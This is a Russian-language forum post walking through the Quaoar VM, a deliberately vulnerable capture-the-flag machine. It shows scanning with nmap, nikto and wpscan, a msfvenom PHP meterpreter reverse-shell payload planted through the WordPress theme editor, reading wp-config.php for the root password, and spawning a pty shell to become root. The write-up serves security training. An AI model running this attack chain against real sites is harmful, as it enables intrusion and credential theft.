ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Задания/Квесты/CTF/Конкурсы (https://forum.antichat.xyz/forumdisplay.php?f=112)
-   -   CTF. Hack the Quaoar VM (https://forum.antichat.xyz/showthread.php?t=1619607)

Vander 11.05.2017 23:49
Всем привет, эта статья, будет посвящена соревнованиям в рамках CTF. На этот раз мы будем искать флаги и уязвимости в системе Quaoar VM.

https://forum.antichat.xyz/attachmen...0ecd924852.png

Скачиваем систему отсюда - https://download.vulnhub.com/hackfest2016/

Монтируем в Oracle VBox или куда удобно и приступаем к сканированию.

> nmap –sV 172.16.0.178

https://forum.antichat.xyz/attachmen...6a68a3fe97.png


Видим, что имеется запущенный веб сервер, просканируем его с помощьюnikto:

> nikto – h 172.16.0.178

https://forum.antichat.xyz/attachmen...80c275003e.png

Итогом будет обнаружение файла robots.txt

https://forum.antichat.xyz/attachmen...eab8fbde2b.png

robots.txt - это файл, который находится в корне сайта. В нём записываются инструкции для поисковых роботов. Эти инструкции могут запрещать к индексации некоторые разделы или страницы на сайте, указывать на правильное «зеркалирование» домена, рекомендовать поисковому роботу соблюдать определенный временной интервал между скачиванием документов с сервера и т.д.

Так же, есть доступная для нас директория wordpress, соответственно есть административная панель:

https://forum.antichat.xyz/attachmen...d781f9acfb.png

С помощью wpscan, попробуем получить список пользователей:

> wpscan –urlhttp://172.16.0.178/wordpress/-- enumerate u

https://forum.antichat.xyz/attachmen...32ef7129ee.png


В результате получаем учетные данные от административной панели:

https://forum.antichat.xyz/attachmen...aeb94f7c29.png

Следующим шагом будет получение сессии meterpreter с уязвимого хоста, делать будем это с помощью учетной записи Администратора, выполнив, вредоносный php код в редакторе тем. Для начала, создадим код полезной нагрузки с помощью msfvenom:

> msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.0.172 lport=4444 -f raw

https://forum.antichat.xyz/attachmen...c3f2a6045f.png


Полученный код копируем от use exploit/multi/handler

> set payload php/meterpreter/reverse_tcp

> set lhost 172.16.0.172

> set lport 4444

> exploit

Открываем путь к вредоносному шаблону в браузере как показано на скриншоте ниже:

https://forum.antichat.xyz/attachmen...36740b3501.png

Результатом будет открытая сессия meterpreter:

https://forum.antichat.xyz/attachmen...0139ea4d9c.png

Так как первая цель получить shell, то мы ее достигли. Немного побродив по серверу, в папке /home/wpadmin/ обнаруживается файл flag.txt.

https://forum.antichat.xyz/attachmen...c17849f9cb.png

А если заглянуть в /var/www/wordpress/wp-config.php, то с большой вероятностью можно сказать, что мы нашли пароль root:

> cat /var/www/wordpress/wp-config.php

https://forum.antichat.xyz/attachmen...dd639923c8.png


Попробуем стать root:


> echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/aaa.py (Команда позволит создать в указанной папке скрипт, который даст нам доступ к pty)


> python /tmp/aaa.py

Выполненные команды позволили нам войти в терминал.


> su(Вводим пароль root)

https://forum.antichat.xyz/attachmen...31347f09b2.png

Перейдя в корневую директорию, находим второй флаг:

https://forum.antichat.xyz/attachmen...227227afae.png

Третий и последний флаг (хотя, в принципе, цели достигнуты) находится в /etc/cron.d/php5:

> cat /etc/cron.d/php5

https://forum.antichat.xyz/attachmen...e2723e9cbd.png

На этом прохождение Quaoar VM можно считать завершенным. Спасибо за внимание.


Время: 00:58